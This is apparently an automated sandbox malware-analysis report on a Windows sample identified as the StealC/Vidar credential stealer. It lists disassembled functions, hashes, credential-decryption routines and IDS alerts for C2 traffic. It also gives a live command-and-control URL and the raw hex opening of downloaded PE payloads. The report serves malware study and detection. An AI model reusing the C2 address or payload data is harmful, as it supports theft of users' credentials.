Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: be2dabe3d40b6a20f75471a56eacb56052f9a52daf4a3c1f9898b6ec486dff37
Instruction ID: 39c74395e108aae9c28c8c4da95809e6752934044c9aa17dc846714cee8a1ce4
Opcode Fuzzy Hash: be2dabe3d40b6a20f75471a56eacb56052f9a52daf4a3c1f9898b6ec486dff37
Instruction Fuzzy Hash: A2314FB1D00208AFDB14EFD0CD49BEDB775EB44304F14495AE506AB284DB789E85CB56

Function 6C5FB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5FB4F5
AcquireSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C5FB502
ReleaseSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C5FB542
free.MOZGLUE(?), ref: 6C5FB578

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 15b5c8a1440ba34bcda0de875da0c939753559f40462d54435054b5040a28b85
Instruction ID: c6cec13c53de3d8d74e5ebe117e7cad0f5574e88ab3039cdf3c13f6b94b7d2af
Opcode Fuzzy Hash: 15b5c8a1440ba34bcda0de875da0c939753559f40462d54435054b5040a28b85
Instruction Fuzzy Hash: 4A11D230A04B41C7D312DF2AD844765B3B1FFD6318F14570AE85953E02FBB4A1C68B9A

Function 00487980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E00,00000000,?), ref: 004879B0
RtlAllocateHeap.NTDLL(00000000), ref: 004879B7
GetLocalTime.KERNEL32(?,?,?,?,?,00490E00,00000000,?), ref: 004879C4
wsprintfA.USER32 ref: 004879F3

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 375ce6bb59398974f1dd6ed8710d135ea266adbfbbd376e2ddbee4e8ed962dfc
Instruction ID: 7eecb7ee6da5003b60a3bf979ab17e46814547a74611366c9a2e616fea87aa0a
Opcode Fuzzy Hash: 375ce6bb59398974f1dd6ed8710d135ea266adbfbbd376e2ddbee4e8ed962dfc
Instruction Fuzzy Hash: 301127F2904118ABCB14DFC9DD45BBEB7F9FB4CB11F10461AF605A2280E2395940CBB5

Function 6C623DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C5EF20E,?), ref: 6C623DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C5EF20E,00000000,?), ref: 6C623DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C623E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C623E0E

Part of subcall function 6C61CC00: GetCurrentProcess.KERNEL32(?,?,6C5E31A7), ref: 6C61CC0D
Part of subcall function 6C61CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C5E31A7), ref: 6C61CC16

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 1faceeadd916ff7f50514cf277e75d2140cf57abdc311f8e2f038d0cafbef299
Instruction ID: 2d28c80199d6dbf32566fb45cb9edad2153cc666cd23deec4d333d8d9bf72dea
Opcode Fuzzy Hash: 1faceeadd916ff7f50514cf277e75d2140cf57abdc311f8e2f038d0cafbef299
Instruction Fuzzy Hash: 5BF0FEB16002087BDB00AB55DC81DBB376DEB86624F044025FD4957741D735BD2996EF

Function 0048C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0048C74E

Part of subcall function 0048BF9F: __amsg_exit.LIBCMT ref: 0048BFAF

__getptd.LIBCMT ref: 0048C765
__amsg_exit.LIBCMT ref: 0048C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0048C797

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 16a4fdcfe3093d6c51960b9d639cfed85d4ecb5b961e98e7cb536626ba3dd07b
Instruction ID: f3d18f5d473ed4f3333001d8bf05c5921ec5099271d198795241cd1c59e0bdd3
Opcode Fuzzy Hash: 16a4fdcfe3093d6c51960b9d639cfed85d4ecb5b961e98e7cb536626ba3dd07b
Instruction Fuzzy Hash: 11F06D329042119FD721BBB95887B4E33A0AF00728F20495FF604A62D2DB7C59419FAE

Function 6C5EBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C5EBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5EBE8F

Strings

0, xrefs: 6C5EBE5B

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 9e3635318b4ba7cfb60abdf08966d12ea145c3261b2370af59d8ed1929ffdb31
Instruction ID: 3171aab213ae3c708e3ecd754c9fe37f1e734ae5f9fceb4584953884e369f5f9
Opcode Fuzzy Hash: 9e3635318b4ba7cfb60abdf08966d12ea145c3261b2370af59d8ed1929ffdb31
Instruction Fuzzy Hash: 4041B071909745CFC701DF39C981A9BB7F4AF8E348F008A1DF985A7611E730D9598B86

Function 6C623CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C623D19
mozalloc_abort.MOZGLUE(?), ref: 6C623D6C

Strings

d, xrefs: 6C623D58

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 42f4425474197ff3db19a50c448fdcc7589227a493ee1330ec5abd9497adffdc
Instruction ID: 91b680c33ea12bbe9ab440e04cc5bf12ff52462f62112c09fd74e334ce568faf
Opcode Fuzzy Hash: 42f4425474197ff3db19a50c448fdcc7589227a493ee1330ec5abd9497adffdc
Instruction Fuzzy Hash: 5D112735E04788D7DB00CF6ACC544EDB7B9EF86318F848628DC459BA42FB34A584CB99

Function 6C646DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C646E22
__Init_thread_footer.LIBCMT ref: 6C646E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C646E1D

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: ba6e75a45a6e20600e9cf26652ae401a9d228f2ba7c18663b7c46b0f23313933
Instruction ID: d9af9cbb3747b99f2affafc317512e79c6a673c11831fcd97793ac1aa4d7474d
Opcode Fuzzy Hash: ba6e75a45a6e20600e9cf26652ae401a9d228f2ba7c18663b7c46b0f23313933
Instruction Fuzzy Hash: 03F0B4766092818BDB008B6BC890FA177B16713318F049165C445C6F61DB62ED07CE9F

Function 6C5F6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kbl,?,6C624B30,80000000,?,6C624AB7,?,6C5E43CF,?,6C5E42D2), ref: 6C5F6C42

Part of subcall function 6C5FCA10: malloc.MOZGLUE(?), ref: 6C5FCA26

moz_xmalloc.MOZGLUE(0Kbl,?,6C624B30,80000000,?,6C624AB7,?,6C5E43CF,?,6C5E42D2), ref: 6C5F6C58

Strings

0Kbl, xrefs: 6C5F6C33, 6C5F6C41, 6C5F6C57

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kbl
API String ID: 1967447596-3194970570
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 09744b20e1d881cd951cec10ffd1f51229e6f8e07e87e8e8548b30eafc1507aa
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: DAE026F1A103004ADB0CD8789C1952A71C8CB342A87044A35E8B2C3BC8FF14F8528C51

Function 6C63B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C63B2C9,?,?,?,6C63B127,?,?,?,?,?,?,?,?,?,6C63AE52), ref: 6C63B628

Part of subcall function 6C6390E0: free.MOZGLUE(?,00000000,?,?,6C63DEDB), ref: 6C6390FF
Part of subcall function 6C6390E0: free.MOZGLUE(?,00000000,?,?,6C63DEDB), ref: 6C639108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C63B2C9,?,?,?,6C63B127,?,?,?,?,?,?,?,?,?,6C63AE52), ref: 6C63B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C63B2C9,?,?,?,6C63B127,?,?,?,?,?,?,?,?,?,6C63AE52), ref: 6C63B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C63B127,?,?,?,?,?,?,?,?), ref: 6C63B74D

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: c1e052874a0f63ed6ecc672e201771261e36f8f39d93691ecb195c6a6bdec540
Instruction ID: 2f5d595171dd2677d6275a259c9e11b8c2e2c0bbfd7ac2037be6e1614fa5b1a8
Opcode Fuzzy Hash: c1e052874a0f63ed6ecc672e201771261e36f8f39d93691ecb195c6a6bdec540
Instruction Fuzzy Hash: E851C071A01A258BDB14CF58C98476EB7B1FF85304F05B52DC85EAB701DB31A804CBA9

Source: 0.2.file.exe.470000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.470000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00479B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00479B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0047C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00477240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00477240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00479AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00479AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00488EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00488EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C5F6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49732 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49732 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49732 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 